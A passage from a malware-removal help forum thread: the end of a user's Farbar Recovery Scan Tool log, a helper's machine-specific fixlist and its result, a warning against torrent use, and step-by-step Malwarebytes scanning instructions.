2015-01-27 22:06 - 2015-01-27 22:06 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP
2015-01-27 22:06 - 2015-01-27 22:06 - 00000000 ____D () C:\ProgramData\HP
2015-01-27 22:06 - 2015-01-27 22:06 - 00000000 ____D () C:\Program Files\HP
2015-01-27 22:06 - 2015-01-27 22:06 - 00000000 ____D () C:\Program Files (x86)\HP
2015-01-27 22:06 - 2012-10-17 04:31 - 00741480 ____N (Hewlett-Packard Co.) C:\Windows\system32\HPDiscoPM4812.dll
2015-01-27 21:56 - 2015-01-27 22:19 - 00000000 ____D () C:\Users\Tom Jones\AppData\Local\gtk-2.0
2015-01-27 21:19 - 2015-01-27 21:19 - 00000661 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wireshark.lnk
2015-01-27 21:19 - 2015-01-27 21:19 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinPcap
2015-01-27 21:19 - 2015-01-27 21:19 - 00000000 ____D () C:\Program Files (x86)\WinPcap
2015-01-26 17:55 - 2015-01-26 17:55 - 00000000 ____D () C:\ProgramData\Electronic Arts
2015-01-26 17:31 - 2015-01-26 17:31 - 00012124 _____ () C:\Users\Tom Jones\Downloads\Stranded_Deep_v0.01_setup.exe.torrent
2015-01-26 01:10 - 2015-01-26 01:10 - 00012844 _____ () C:\Users\Tom Jones\Downloads\The Hacker's Manual (2015).pdf.torrent
2015-01-26 01:00 - 2015-01-26 01:00 - 00014961 _____ () C:\Users\Tom Jones\Downloads\The Little Death (2014) [1080p].torrent
2015-01-26 00:59 - 2015-01-26 00:59 - 00019139 _____ () C:\Users\Tom Jones\Downloads\Ronin (1998) [1080p].torrent
2015-01-26 00:50 - 2015-01-26 00:50 - 01677904 _____ (BitTorrent Inc.) C:\Users\Tom Jones\Downloads\uTorrent.exe
2015-01-25 19:08 - 2015-01-25 19:15 - 00025370 _____ () C:\ComboFix.txt
2015-01-25 18:56 - 2015-01-25 18:56 - 00000000 ____D () C:\Users\Tom Jones\AppData\Roaming\JetBrains
2015-01-24 12:37 - 2015-01-24 12:37 - 00025946 _____ () C:\Users\Tom Jones\Downloads\ComboFix.txt
2015-01-24 12:19 - 2015-01-25 19:08 - 00000000 ____D () C:\Qoobox
2015-01-24 12:19 - 2015-01-24 12:22 - 00000000 ____D () C:\Windows\erdnt
2015-01-24 12:19 - 2011-06-26 01:45 - 00256000 _____ () C:\Windows\PEV.exe
2015-01-24 12:19 - 2010-11-07 12:20 - 00208896 _____ () C:\Windows\MBR.exe
2015-01-24 12:19 - 2009-04-19 23:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2015-01-24 12:19 - 2000-08-30 19:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2015-01-24 12:19 - 2000-08-30 19:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2015-01-24 12:19 - 2000-08-30 19:00 - 00098816 _____ () C:\Windows\sed.exe
2015-01-24 12:19 - 2000-08-30 19:00 - 00080412 _____ () C:\Windows\grep.exe
2015-01-24 12:19 - 2000-08-30 19:00 - 00068096 _____ () C:\Windows\zip.exe
2015-01-24 12:16 - 2015-01-24 12:16 - 05609462 ____R (Swearware) C:\Users\Tom Jones\Downloads\ComboFix.exe
2015-01-23 23:49 - 2015-01-23 23:49 - 04197016 _____ (Kaspersky Lab ZAO) C:\Users\Tom Jones\Downloads\tdsskiller.exe
2015-01-23 20:07 - 2015-01-26 18:14 - 02194432 _____ () C:\Users\Tom Jones\Downloads\AdwCleaner.exe
2015-01-23 12:35 - 2015-01-23 12:35 - 00000000 ____D () C:\_OTL
2015-01-23 12:34 - 2015-01-23 12:34 - 00602112 _____ (OldTimer Tools) C:\Users\Tom Jones\Downloads\OTL.exe
2015-01-23 08:07 - 2015-01-28 14:23 - 00004138 _____ () C:\Windows\PFRO.log
2015-01-23 08:07 - 2015-01-28 14:23 - 00002856 _____ () C:\Windows\setupact.log
2015-01-23 08:07 - 2015-01-23 08:07 - 00000000 _____ () C:\Windows\setuperr.log
2015-01-23 00:23 - 2015-01-28 14:27 - 02130432 _____ (Farbar) C:\Users\Tom Jones\Downloads\FRST64.exe
2015-01-22 20:49 - 2015-01-28 14:22 - 00000000 ____D () C:\AdwCleaner
2015-01-22 20:01 - 2015-01-28 14:27 - 00020450 _____ () C:\Users\Tom Jones\Downloads\FRST.txt
2015-01-22 20:00 - 2015-01-28 14:27 - 00000000 ____D () C:\FRST
2015-01-22 00:05 - 2015-01-22 00:05 - 00000000 ____D () C:\Users\Tom Jones\.jmc
2015-01-22 00:02 - 2015-01-22 00:02 - 00000000 ____D () C:\Windows\System32\Tasks\Safer-Networking
2015-01-21 23:50 - 2015-01-22 21:10 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2015-01-21 23:49 - 2015-01-22 21:11 - 00000000 ____D () C:\Users\Tom Jones\Desktop\mbar
2015-01-21 22:33 - 2015-01-22 11:23 - 00037624 _____ () C:\Windows\system32\Drivers\TrueSight.sys
2015-01-21 22:33 - 2015-01-21 22:33 - 00000000 ____D () C:\ProgramData\RogueKiller
2015-01-20 16:15 - 2015-01-20 16:15 - 00000958 _____ () C:\Users\Tom Jones\Desktop\Android Studio.lnk
2015-01-15 15:06 - 2015-01-15 15:06 - 00000000 ____D () C:\Users\Tom Jones\Documents\FIFA 15
2015-01-13 16:45 - 2014-12-18 22:06 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\profsvc.dll
2015-01-13 16:45 - 2014-12-18 20:46 - 00141312 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxdav.sys
2015-01-13 16:45 - 2014-12-12 00:35 - 05553592 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2015-01-13 16:45 - 2014-12-12 00:31 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2015-01-13 16:45 - 2014-12-12 00:31 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2015-01-13 16:45 - 2014-12-12 00:31 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2015-01-13 16:45 - 2014-12-12 00:11 - 03971512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2015-01-13 16:45 - 2014-12-12 00:11 - 03916728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2015-01-13 16:45 - 2014-12-12 00:07 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2015-01-13 16:45 - 2014-12-11 12:47 - 00087040 _____ (Microsoft Corporation) C:\Windows\system32\TSWbPrxy.exe
2015-01-13 16:45 - 2014-12-05 23:17 - 00303616 _____ (Microsoft Corporation) C:\Windows\system32\nlasvc.dll
2015-01-13 16:45 - 2014-12-05 22:50 - 00156672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncsi.dll
2015-01-13 16:45 - 2014-12-05 22:50 - 00052224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\nlaapi.dll
2015-01-01 03:55 - 2015-01-22 21:15 - 00000192 _____ () C:\Users\Tom Jones\Downloads\111111111111.txt
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2015-01-28 14:24 - 2012-06-03 19:17 - 00000000 ____D () C:\Users\Tom Jones\AppData\Roaming\Skype
2015-01-28 14:23 - 2012-03-24 06:13 - 00000000 ____D () C:\Program Files (x86)\Steam
2015-01-28 14:23 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2015-01-28 14:22 - 2013-10-12 14:32 - 00000932 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-265094073-1043058997-3425087786-1000UA.job
2015-01-28 14:22 - 2012-09-15 00:14 - 01943480 _____ () C:\Windows\WindowsUpdate.log
2015-01-28 12:03 - 2009-07-13 23:45 - 00021280 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-01-28 12:03 - 2009-07-13 23:45 - 00021280 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-01-28 12:02 - 2009-07-14 00:13 - 00880194 _____ () C:\Windows\system32\PerfStringBackup.INI
2015-01-28 01:50 - 2014-06-23 14:09 - 00003026 _____ () C:\Windows\System32\Tasks\MSIAfterburner
2015-01-27 23:20 - 2012-03-24 07:57 - 00000000 ____D () C:\Windows\pss
2015-01-27 19:22 - 2013-10-12 14:32 - 00000880 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-265094073-1043058997-3425087786-1000Core.job
2015-01-27 14:59 - 2012-03-24 06:27 - 00000000 ____D () C:\Users\Tom Jones\AppData\Roaming\uTorrent
2015-01-26 23:23 - 2012-12-22 23:09 - 00002356 _____ () C:\Users\Tom Jones\Desktop\Google Chrome.lnk
2015-01-26 18:28 - 2013-10-20 16:08 - 00000000 ____D () C:\Users\Tom Jones\Documents\FIFA 14
2015-01-26 17:34 - 2014-07-01 00:35 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2015-01-26 17:33 - 2013-04-16 15:24 - 00000000 ____D () C:\Users\Tom Jones\AppData\Local\Apps\2.0
2015-01-26 00:51 - 2013-11-02 00:19 - 00000799 _____ () C:\Users\Tom Jones\AppData\Roaming\Microsoft\Windows\Start Menu\µTorrent.lnk
2015-01-25 19:07 - 2009-07-13 21:34 - 00000215 _____ () C:\Windows\system.ini
2015-01-24 20:11 - 2014-10-20 21:28 - 00272296 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaws.exe
2015-01-24 20:11 - 2014-10-20 21:28 - 00176552 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaw.exe
2015-01-24 20:11 - 2014-10-20 21:28 - 00176552 _____ (Oracle Corporation) C:\Windows\SysWOW64\java.exe
2015-01-24 20:11 - 2014-10-20 21:28 - 00098216 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2015-01-24 20:11 - 2014-10-20 21:28 - 00000000 ____D () C:\Program Files (x86)\Java
2015-01-24 20:11 - 2014-02-22 13:06 - 00319912 _____ (Oracle Corporation) C:\Windows\system32\javaws.exe
2015-01-24 20:11 - 2014-02-22 13:06 - 00191400 _____ (Oracle Corporation) C:\Windows\system32\javaw.exe
2015-01-24 20:11 - 2014-02-22 13:06 - 00190888 _____ (Oracle Corporation) C:\Windows\system32\java.exe
2015-01-24 20:11 - 2014-02-22 13:06 - 00111016 _____ (Oracle Corporation) C:\Windows\system32\WindowsAccessBridge-64.dll
2015-01-24 20:11 - 2014-02-22 13:06 - 00000000 ____D () C:\Program Files\Java
2015-01-24 20:11 - 2013-11-17 13:41 - 00000000 ____D () C:\ProgramData\Oracle
2015-01-24 12:23 - 2014-12-27 13:56 - 00000000 ____D () C:\Users\Tom%20Jones
2015-01-24 12:23 - 2009-07-13 22:20 - 00000000 __RHD () C:\Users\Default
2015-01-24 02:00 - 2013-04-16 15:24 - 00000000 ____D () C:\Users\Tom Jones\AppData\Local\Deployment
2015-01-23 20:49 - 2012-12-22 23:33 - 00000000 ____D () C:\Users\Tom Jones\AppData\Local\CRE
2015-01-23 19:49 - 2012-03-24 10:07 - 00000000 ____D () C:\Users\Tom Jones\AppData\Roaming\FileZilla
2015-01-23 19:08 - 2013-12-21 00:56 - 00000000 ____D () C:\Users\Tom Jones\Documents\visual studio 2013
2015-01-23 16:54 - 2012-03-24 07:32 - 00000000 ____D () C:\Users\Tom Jones\AppData\Local\Downloaded Installations
2015-01-23 16:42 - 2013-11-13 23:06 - 00000000 ____D () C:\Users\Tom Jones\AppData\Roaming\SSH
2015-01-23 13:47 - 2009-07-13 22:20 - 00000000 ___HD () C:\Windows\system32\GroupPolicy
2015-01-23 00:11 - 2013-04-09 23:28 - 00000000 ____D () C:\Users\Tom Jones\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LastPass
2015-01-22 22:05 - 2012-03-24 05:03 - 00000000 ____D () C:\Users\Tom Jones
2015-01-22 21:11 - 2014-07-01 00:35 - 00097496 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2015-01-22 20:55 - 2014-05-05 00:51 - 00701616 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2015-01-22 20:55 - 2012-07-03 13:41 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2015-01-20 23:10 - 2012-03-25 05:33 - 00000000 ____D () C:\Users\Tom Jones\AppData\Roaming\MiniLyrics
2015-01-20 00:31 - 2012-03-24 06:03 - 00000000 ____D () C:\Users\Tom Jones\AppData\Roaming\Adobe
2015-01-14 01:56 - 2013-07-22 20:27 - 00000000 ____D () C:\ProgramData\Codemasters
2015-01-14 01:56 - 2013-07-08 22:24 - 00000000 ____D () C:\Users\Tom Jones\Documents\My Games
2015-01-12 14:50 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\tracing
2015-01-12 01:18 - 2012-10-24 23:13 - 00000000 ____D () C:\Windows\SysWOW64\directx
2015-01-06 13:14 - 2012-10-07 15:51 - 00000600 _____ () C:\Users\Tom Jones\AppData\Local\PUTTY.RND
2014-12-31 06:14 - 2010-11-20 22:27 - 00298120 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
 
==================== Files in the root of some directories =======
 
2014-01-04 23:40 - 2014-01-04 23:42 - 0001252 _____ () C:\Users\Tom Jones\AppData\Roaming\AutoTagLog.log
2014-01-04 23:31 - 2014-01-04 23:43 - 0000888 _____ () C:\Users\Tom Jones\AppData\Roaming\RegistrationLog.log
2014-05-29 16:14 - 2014-06-25 21:00 - 0008192 _____ () C:\Users\Tom Jones\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2013-07-01 18:05 - 2013-07-01 18:05 - 0000001 _____ () C:\Users\Tom Jones\AppData\Local\llftool.4.30.agreement
2012-10-07 15:51 - 2015-01-06 13:14 - 0000600 _____ () C:\Users\Tom Jones\AppData\Local\PUTTY.RND
2015-01-27 22:54 - 2015-01-27 22:54 - 0000739 _____ () C:\Users\Tom Jones\AppData\Local\recently-used.xbel
2012-03-26 17:26 - 2013-08-27 20:52 - 0007602 _____ () C:\Users\Tom Jones\AppData\Local\resmon.resmoncfg
2015-01-27 22:06 - 2015-01-27 22:06 - 0000057 _____ () C:\ProgramData\Ament.ini
 
Some content of TEMP:
====================
C:\Users\Tom Jones\AppData\Local\Temp\Quarantine.exe
C:\Users\Tom Jones\AppData\Local\Temp\sqlite3.dll
C:\Users\Tom Jones\AppData\Local\Temp\uttB576.tmp.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2015-01-24 13:10
 
==================== End Of Log ============================


#12 Johnny Computer

Johnny Computer

  • Malware Response Team
  • 1,739 posts
  • Gender:Male
  • Location:127.0.0.1
  • Local time:11:21 AM

Posted 28 January 2015 - 03:45 PM

Hi TomFullerton-

I issued you a P2P warning in an earlier post:

It is pretty much certain that if you continue to use P2P programs, you will get infected again.

I would recommend that you uninstall uTorrent; however, that choice is up to you. If you wish to keep it, please do not use it until your computer is cleaned.

You are downloading more torrents. You are going to re-infect yourself before your machine is even clean. :wink: As requested in my P2P warning, please stop downloading torrents during this fix.
 
 ---------------------------------------------------------------------------------

Please copy and paste the contents of the code box below into a Notepad file and save it as Fixlist.txt in the location where your FRST.exe file is located.
 
HKU\S-1-5-21-265094073-1043058997-3425087786-1000\...\RunOnce: [Adobe Speed Launcher] => 1422473019
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
EmptyTemp:
 
NOTE: It's important that both files, FRST/FRST64 and fixlist.txt, are in the same location or the fix will not work.
 
NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.
 
Run FRST/FRST64 and press the Fix button just once and wait.
 
If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
 
When finished, FRST will generate a log on the Desktop (Fixlog.txt). Please post it in your reply.
 
 ======================================================
 
IN YOUR NEXT REPLY I NEED:
 
1.) Your Fixlist log
 
 
Thanks  :)

"DO OR DO NOT. THERE IS NO TRY."


#13 Johnny Computer

Johnny Computer

  • Malware Response Team
  • 1,739 posts
  • Gender:Male
  • Location:127.0.0.1
  • Local time:11:21 AM

Posted 31 January 2015 - 02:12 PM

Hello TomFullerton-

It has been almost 3 days since your last reply. Do you still need help? If so, please follow the instructions in my previous post; otherwise this thread will be closed.

Thanks :)


"DO OR DO NOT. THERE IS NO TRY."


#14 tomfullerton

tomfullerton
  • Topic Starter

  • Members
  • 9 posts
  • Local time:12:21 PM

Posted 01 February 2015 - 01:31 AM

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 28-01-2015
Ran by Tom Jones at 2015-01-28 23:17:24 Run:3
Running from C:\Users\Tom Jones\Downloads
Loaded Profiles: Tom Jones (Available profiles: Tom Jones)
Boot Mode: Normal
==============================================
 
Content of fixlist:
*****************
HKU\S-1-5-21-265094073-1043058997-3425087786-1000\...\RunOnce: [Adobe Speed Launcher] => 1422473019
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
EmptyTemp:
*****************
 
HKU\S-1-5-21-265094073-1043058997-3425087786-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\\Adobe Speed Launcher => value deleted successfully.
"HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" => Key deleted successfully.
"HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Policies\Microsoft\Internet Explorer" => Key deleted successfully.
EmptyTemp: => Removed 537.2 MB temporary data.
 
 
The system needed a reboot. 
 
==== End of Fixlog 23:17:38 ====


#15 Johnny Computer

Johnny Computer

  • Malware Response Team
  • 1,739 posts
  • Gender:Male
  • Location:127.0.0.1
  • Local time:11:21 AM

Posted 01 February 2015 - 11:37 AM

Hi TomFullerton-
 
Please download Malwarebytes Anti-Malware and save it to your desktop.
  • Double-click on the setup file (mbam-setup.exe), then click on Run to install.
  • Malwarebytes will automatically open to its Dashboard. If you have never run this version, you should see a red note at the top indicating "A scan has never been run on your system".
  • Click on Update Now to download the current database definitions, then click the Scan Now >> button.
  • If you have run this version before, you should see a green note at the top indicating "Your system is fully protected".
  • You will be prompted to update Malwarebytes...click on the Update Now button.
  • The THREAT SCAN will automatically begin.
  • When the scan has completed, the results will be displayed. Click on Quarantine All, then click on Apply Actions.
  • To complete any actions taken you will be prompted to restart your computer...click on Yes. Failure to reboot normally will prevent Malwarebytes from removing all the malware.
  • After rebooting the computer, copy and paste the mbam.log in your next reply.

To retrieve the Malwarebytes Anti-Malware 2.0 scan log information (Method 1)
  • Open Malwarebytes Anti-Malware.
  • Click the History Tab at the top and select Application Logs.
  • Select (check) the box next to Scan Log. Choose the most current scan.
  • Click the View button.
  • Click Copy to Clipboard at the bottom...come back to this thread, click Add Reply, then right-click and choose Paste.
  • Alternatively, you can click Export and save the log as a .txt file on your Desktop or another location.
  • Be sure to post the complete log to include the top portion which shows MBAM's database version and your operating system.

To retrieve the Malwarebytes Anti-Malware 2.0 scan log information (Method 2)
  • Open Malwarebytes Anti-Malware.
  • Click the Scan Tab at the top.
  • Click the View detailed log link on the right.
  • Click Copy to Clipboard at the bottom...come back to this thread, click Add Reply, then right-click and choose Paste.
  • Alternatively, you can click Export and save the log as a .txt file on your Desktop or another location.
  • Be sure to post the complete log to include the top portion which shows MBAM's database version and your operating system.

Logs are named by the date of scan in the following format: mbam-log-yyyy-mm-dd and automatically saved to the following locations:
-- XP: C:\Documents and Settings\<Username>\Application Data\Malwarebytes\Malwarebytes Anti-Malware\Logs\mbam-log-yyyy-mm-dd
-- Vista, Windows 7/8: C:\ProgramData\Malwarebytes\Malwarebytes Anti-Malware\Logs\mbam-log-yyyy-mm-dd

 
 ------------------------------------------------------------------
 
Please make sure the additions.txt option is checked, re-run FRST (just the scan, not the fix), and post both logs.
 
 
 ----------------------------------------------------------------------------
 
IN YOUR NEXT REPLY I NEED:
 
1.) MBAM Log
2.) FRST Logs
3.) How is your system running now? Are you experiencing all, some, or none of your previous issues?
 
 
Thanks  :)


Edited by Johnny Computer, 01 February 2015 - 04:31 PM.

"DO OR DO NOT. THERE IS NO TRY."




